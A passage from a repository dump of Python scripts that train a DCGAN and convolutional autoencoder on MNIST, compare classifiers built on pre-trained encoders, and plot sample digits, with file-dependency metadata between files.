from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import sys
import numpy as np
# MNIST image geometry (28x28 grayscale)
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
# Dimensionality of the generator's input noise vector
latent_dim = 100
# Adam(lr=0.0002, beta_1=0.5), shared by discriminator and combined model
optimizer = Adam(0.0002, 0.5)
def save_imgs(gen_imgs, epoch):
    """Save a 5x5 grid of generated digits to Images/mnist_dcgan_<epoch>.png."""
    rows, cols = 5, 5
    # Map the generator's tanh output from [-1, 1] back to [0, 1] for display
    imgs = 0.5 * gen_imgs + 0.5
    fig, axes = plt.subplots(rows, cols)
    # fig.suptitle("DCGAN: Generated digits", fontsize=12)
    for idx in range(rows * cols):
        ax = axes[idx // cols, idx % cols]
        ax.imshow(imgs[idx, :, :, 0], cmap='gray')
        ax.axis('off')
    fig.savefig("Images/mnist_dcgan_%d.png" % epoch)
    plt.close()
def build_generator():
    """Build the DCGAN generator: (latent_dim,) noise -> 28x28x1 image in [-1, 1].

    Projects the noise to a 7x7x128 feature map, then upsamples twice
    (7 -> 14 -> 28) with Conv2D+ReLU+BatchNorm stages, finishing with tanh.
    """
    model = Sequential()
    # FIX: input_shape must be a shape tuple, not the bare int `latent_dim`;
    # passing an int raises when Keras tries to iterate the shape.
    model.add(Dense(128 * 7 * 7, activation="relu", input_shape=(latent_dim,)))
    model.add(Reshape((7, 7, 128)))
    model.add(BatchNormalization(momentum=0.8))
    model.add(UpSampling2D())
    model.add(Conv2D(128, kernel_size=3, padding="same"))
    model.add(Activation("relu"))
    model.add(BatchNormalization(momentum=0.8))
    model.add(UpSampling2D())
    model.add(Conv2D(64, kernel_size=3, padding="same"))
    model.add(Activation("relu"))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(1, kernel_size=3, padding="same"))
    model.add(Activation("tanh"))
    return model
def build_discriminator():
    """Build the DCGAN discriminator: 28x28x1 image -> sigmoid real/fake score.

    Four strided/plain Conv2D stages with LeakyReLU and Dropout, then a
    flattened sigmoid head.
    """
    stack = [
        Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same"),
        LeakyReLU(alpha=0.2),
        Dropout(0.25),
        Conv2D(64, kernel_size=3, strides=2, padding="same"),
        # Pad one row (bottom) and one column (right) so the odd spatial
        # size divides evenly in the next strided convolution.
        ZeroPadding2D(padding=((0, 1), (0, 1))),
        LeakyReLU(alpha=0.2),
        Dropout(0.25),
        BatchNormalization(momentum=0.8),
        Conv2D(128, kernel_size=3, strides=2, padding="same"),
        LeakyReLU(alpha=0.2),
        Dropout(0.25),
        BatchNormalization(momentum=0.8),
        Conv2D(256, kernel_size=3, strides=1, padding="same"),
        LeakyReLU(alpha=0.2),
        Dropout(0.25),
        Flatten(),
        Dense(1, activation='sigmoid'),
    ]
    model = Sequential()
    for layer in stack:
        model.add(layer)
    return model
# Build and compile the discriminator
print('Discriminator')
discriminator = build_discriminator()
discriminator.compile(loss='binary_crossentropy',
                      optimizer=optimizer,
                      metrics=['accuracy'])

# Build and compile the generator
print('Generator')
generator = build_generator()
generator.compile(loss='binary_crossentropy', optimizer=optimizer)

# The generator takes noise as input and produces generated images
# NOTE(review): this graph-building `z` is later reused as a per-batch
# noise array inside the training loop below
z = Input(shape=(100,))
img = generator(z)

# For the combined model we will only train the generator
discriminator.trainable = False

# The discriminator takes generated images as input and determines validity
valid = discriminator(img)

# The combined model (stacked generator and discriminator) takes
# noise as input => generates images => determines validity
combined = Model(z, valid)
combined.compile(loss='binary_crossentropy', optimizer=optimizer)

# Train models
# Load the dataset (labels are discarded; this is unsupervised)
(X_train, _), (_, _) = mnist.load_data()

# Rescale pixel values to [-1, 1] to match the generator's tanh output
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=3)

# Training hyperparameters
epochs = 100
batch_size = 32
save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# NOTE(review): half_batch is only referenced by the commented-out
# half-batch training variant inside the loop below
half_batch = int(batch_size / 2)

# Define arrays to hold progression of discriminator and generator losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)

for epoch in range(epochs):
    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
    # Set epoch losses to zero
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0
    # Train on all batches
    for batch in range(num_batches):
        # ---------------------
        #  Train Discriminator
        # ---------------------
        # Select next batch of images from training set and encode
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
        ## Train d on full batch
        # Sample noise and generate img
        z = np.random.normal(size=(batch_size, latent_dim))
        gen_imgs = generator.predict(z)
        # Create labels for discriminator inputs
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))
        ## Train d on half batch (disabled alternative)
        '''# Sample noise and generate img
        z = np.random.normal(size=(half_batch, latent_dim))
        gen_imgs = generator.predict(z)
        # Select a random half of image batch and encode
        idx = np.random.randint(0, batch_size, half_batch)
        imgs = imgs[idx]
        # Create labels for discriminator inputs
        valid = np.ones((half_batch, 1))
        fake = np.zeros((half_batch, 1))'''
        ## Train the discriminator (real images labelled 1, generated labelled 0)
        d_loss_real = discriminator.train_on_batch(imgs, valid)
        d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)
        d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
        ## Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]
        # ---------------------
        #  Train Generator
        # ---------------------
        noise = np.random.normal(0, 1, (batch_size, latent_dim))
        # Train the generator (wants discriminator to mistake images as real)
        g_loss = combined.train_on_batch(noise, np.ones((batch_size, 1)))
        g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss
        g_epoch_loss_sum += g_loss
        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch, batch, num_batches,
              d_loss[0], 100 * d_loss[1], g_loss))
    # Get epoch loss data (average minibatch loss over the epoch)
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
    # If at save interval => save generated image samples
    if epoch % save_interval == 0:
        noise = np.random.normal(0, 1, (25, 100))
        gen_imgs = generator.predict(noise)
        save_imgs(gen_imgs, epoch)

## Visualization
# Plot loss curves
# Plot batch loss curves for g and d
plt.figure(1)
batch_numbers = np.arange((epochs * num_batches)) + 1
plt.plot(batch_numbers, d_batch_loss_trajectory, 'b-', batch_numbers, g_batch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Batch Number')
plt.ylabel('Loss')
plt.show()

# Plot epoch loss curves for g and d
plt.figure(2)
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_epoch_loss_trajectory, 'b-', epoch_numbers, g_epoch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper left')
plt.xlabel('Epoch Number')
plt.ylabel('Average Minibatch Loss')
plt.savefig('Images/mnist_bigan_valloss_%d_epochs_%d_bs.png' % (epochs, batch_size))
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,499 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_train.py | from mnist_conv_ae_models import *
import keras.utils
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint
from keras import backend as K
np.random.seed(1337)  # for reproducibility

# Load dataset and scale pixel values to [0, 1]
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1))  # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1))  # adapt this if using `channels_first` image data format
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)

# Create models for encoder, decoder and combined autoencoder
e = encoder_model()
d = decoder_model()
autoencoder = autoencoder_model(e, d)
print(e.count_params(), d.count_params(), autoencoder.count_params())

# Specify loss function and optimizer for autoencoder
#autoencoder.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])

# Early stopping on validation loss, TensorBoard logging, and best-model checkpointing
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto'),
             TensorBoard(log_dir='/tmp/autoencoder', histogram_freq=5, write_graph=True,
                         write_images=True),
             ModelCheckpoint('mnist_conv_autoencoder.h5', monitor='val_loss', save_best_only=True, verbose=0)
             ]

# Train to reconstruct inputs (targets are the images themselves)
history = autoencoder.fit(x_train, x_train,
                          epochs=100,
                          batch_size=128,
                          shuffle=True,
                          validation_split = 1/12.,
                          callbacks=callbacks,
                          verbose=1
                          )

# Save encoder and decoder models
e.save_weights('mnist_conv_ae_encoder.h5', True)
d.save_weights('mnist_conv_ae_decoder.h5', True)

# Summarize history for accuracy
# NOTE(review): 'acc'/'val_acc' are the old Keras history keys; newer
# versions use 'accuracy'/'val_accuracy' — confirm against the pinned version
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Training vs Validation Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', ' Validation'], loc='lower right')
plt.show()

# Summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Training vs Validation Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()

# Reconstruct images based on learned autoencoder
recon_imgs = autoencoder.predict(x_test)

# Plot reconstructed images: originals on the top row, reconstructions below
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
    # display original
    ax = plt.subplot(2, n, i + 1)
    plt.imshow(x_test[i].reshape(28, 28))
    plt.gray()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
    # display reconstruction
    ax = plt.subplot(2, n, i + 1 + n)
    plt.imshow(recon_imgs[i].reshape(28, 28))
    plt.gray()
    ax.get_xaxis().set_visible(False)
    ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,500 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnnist_classifier_comparison.py | import keras
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from mnist_mlp_models import encoder_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_mnist
from common_models.classifier_models import mnist_classifier_e_frozen_model, mnist_classifier_e_trainable_model
# Seed NumPy so experiment runs are repeatable
np.random.seed(12345)

# =====================================
# Constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100

# =====================================
# Data
# =====================================
# Labels are taken from the default-scaled copy of MNIST
(x_train, y_train), (x_test, y_test) = get_mnist()

# Two pixel scalings: autoencoder-family encoders were trained on the default
# range, GAN-family encoders on the gan=True range
(x_train_ae, _), (x_test_ae, _) = get_mnist()
(x_train_gan, _), (x_test_gan, _) = get_mnist(gan=True)

# One-hot targets are shared by every classifier
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)

# =====================================
# Models
# =====================================
# One encoder instance per pre-training scheme
basic_ae = encoder_model()
dae = encoder_model()
sae = encoder_model()
ce = encoder_model()
aae = encoder_model()
lr = encoder_model()
jlr = encoder_model()
bigan = encoder_model()
mod_bigan = encoder_model()
cnn = encoder_model()  # stays randomly initialised: the fully supervised baseline
vae_encoder = vae_encoder_model()
vae = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)

model_path = 'Models/mnist'

# Restore pre-trained weights and freeze each encoder; `cnn` is deliberately
# left untouched (no pre-trained weights, remains trainable).
_encoder_weight_files = {
    basic_ae: '_basic_ae_encoder.h5',
    dae: '_dae_encoder.h5',
    sae: '_sae_encoder.h5',
    ce: '_ce_encoder.h5',
    aae: '_aae_encoder.h5',
    vae: '_vae_encoder.h5',
    lr: '_lr_encoder.h5',
    jlr: '_jlr_encoder.h5',
    bigan: '_bigan_encoder.h5',
    mod_bigan: '_posthoc_bigan_encoder.h5',
}
for _enc, _suffix in _encoder_weight_files.items():
    _enc.load_weights(model_path + _suffix)
    _enc.trainable = False

# =====================================
# Training configuration
# =====================================
epochs = 100
batch_size = 128
val_split = 1/5.
patience = 10

# Stop once validation loss has not improved for `patience` epochs
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')

# Labelled-set sizes to sweep, and independent runs averaged per size
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 60000]
num_iterations = 5
# Mean test accuracy (%) per labelled-set size, one array per classifier.
# The individual classifierN_acc names are kept as aliases because code
# after this section (e.g. the final classifier11 print) refers to them.
num_classifiers = 11
classifier_accs = [np.zeros(len(num_unlabelled)) for _ in range(num_classifiers)]
(classifier1_acc, classifier2_acc, classifier3_acc, classifier4_acc,
 classifier5_acc, classifier6_acc, classifier7_acc, classifier8_acc,
 classifier9_acc, classifier10_acc, classifier11_acc) = classifier_accs


def _build_classifiers():
    """Instantiate and compile one fresh classifier head per encoder.

    Returns a list of (model, data_key) pairs in the fixed classifier
    order 1..11, where data_key selects the pixel scaling the encoder was
    pre-trained on: 'ae' for the default range, 'gan' for the gan=True range.
    """
    specs = [
        (mnist_classifier_e_frozen_model(basic_ae), 'ae'),
        (mnist_classifier_e_frozen_model(dae), 'ae'),
        (mnist_classifier_e_frozen_model(sae), 'ae'),
        (mnist_classifier_e_frozen_model(ce), 'ae'),
        (mnist_classifier_e_frozen_model(vae), 'ae'),
        (mnist_classifier_e_frozen_model(aae), 'ae'),
        (mnist_classifier_e_frozen_model(lr), 'gan'),
        (mnist_classifier_e_frozen_model(jlr), 'gan'),
        (mnist_classifier_e_frozen_model(bigan), 'gan'),
        (mnist_classifier_e_frozen_model(mod_bigan), 'gan'),
        # Fully supervised baseline: encoder weights are trainable
        (mnist_classifier_e_trainable_model(cnn), 'ae'),
    ]
    for model, _ in specs:
        model.compile(loss=keras.losses.categorical_crossentropy,
                      optimizer=keras.optimizers.Adadelta(),
                      metrics=['accuracy'])
    return specs


def _train_and_score(model, idx, x_tr, y_tr, x_te, y_te):
    """Train one classifier and return its test accuracy.

    Uses early stopping plus a checkpoint that keeps the lowest
    validation-loss weights in 'Models/classifier_<idx>.h5'; those best
    weights are restored before evaluating on the test set.
    """
    checkpoint_path = 'Models/classifier_%d.h5' % idx
    model_checkpoint = ModelCheckpoint(checkpoint_path, monitor='val_loss', verbose=1,
                                       save_best_only=True, mode='min')
    model.fit(x_tr, y_tr,
              batch_size=batch_size,
              epochs=epochs,
              verbose=1,
              shuffle=True,
              callbacks=[early_stopping, model_checkpoint],
              validation_split=val_split)
    model.load_weights(checkpoint_path)
    return model.evaluate(x_te, y_te, verbose=0)[1]


# Sweep over the labelled-set sizes of interest
for index, num in enumerate(num_unlabelled):
    # Accumulated accuracy per classifier for this sweep point
    scores = np.zeros(num_classifiers)

    # Reduced training sets for this size (labels are shared by both scalings)
    reduced_x_train = {'ae': x_train_ae[0:num, :, :, :],
                       'gan': x_train_gan[0:num, :, :, :]}
    x_test_sets = {'ae': x_test_ae, 'gan': x_test_gan}
    reduced_y_train = y_train_one_hot[0:num, :]

    # Average classification accuracy over num_iterations independent runs
    for iteration in range(num_iterations):
        print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))

        for clf_idx, (model, data_key) in enumerate(_build_classifiers()):
            scores[clf_idx] += _train_and_score(
                model, clf_idx + 1,
                reduced_x_train[data_key], reduced_y_train,
                x_test_sets[data_key], y_test_one_hot)

    # Record mean accuracy (%) for this labelled-set size (fills the arrays
    # in place, so the classifierN_acc aliases see the same values)
    for clf_idx in range(num_classifiers):
        classifier_accs[clf_idx][index] = 100 * scores[clf_idx] / num_iterations

# Save accuracies to file
for clf_idx, acc in enumerate(classifier_accs):
    np.savetxt('Results/classifier%d.txt' % (clf_idx + 1), acc, fmt='%f')

# Print accuracies for classifiers 1-10 (classifier11_acc is printed next)
for acc in classifier_accs[:10]:
    print(acc)
print(classifier11_acc) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,501 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_plot_recons.py | import numpy as np
import matplotlib.pyplot as plt
from mnist_mlp_models import encoder_model, generator_model
from functions.data_funcs import get_mnist
import matplotlib.gridspec as gridspec

# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_lr'
model_path = 'Models/mnist_lr'

# =====================================
# Load dataset
# =====================================
# Load MNIST data in range [-1,1] (gan=True selects that scaling)
(X_train, _), (X_test, y_test) = get_mnist(gan=True)

# Instantiate models and restore pre-trained BiGAN weights
generator = generator_model(gan=True)
generator.load_weights('Models/mnist_bigan_generator.h5')
encoder = encoder_model()
encoder.load_weights('Models/mnist_bigan_encoder.h5')

# Collect the indices of the first 10 test examples of each digit class,
# producing an evenly class-balanced selection for a 10x10 grid
classes = np.arange(num_classes)
test_digit_indices = np.empty(0)
for class_index in range(num_classes):
    # Indices of all test examples belonging to the current class
    indices = [i for i, y in enumerate(y_test) if y == classes[class_index]]
    indices = np.asarray(indices)
    indices = indices[0:10]
    test_digit_indices = np.concatenate((test_digit_indices, indices))
# np.int was removed in NumPy 1.24; the builtin int is the supported spelling
test_digit_indices = test_digit_indices.astype(int)

# Keep only the selected, class-balanced test digits
X_test = X_test[test_digit_indices]

# Plot the selected digits on a tight 10x10 grid and save the figure
num_rows = 10
num_cols = 10
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=[1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
                       wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
    for j in range(num_cols):
        # Row-major index into the flat selection (num_rows == num_cols here)
        im = X_test[i*num_rows + j].reshape(28, 28)
        ax = plt.subplot(gs[i, j])
        plt.imshow(im)
        plt.gray()
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
plt.savefig('mnist_test_digits')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], 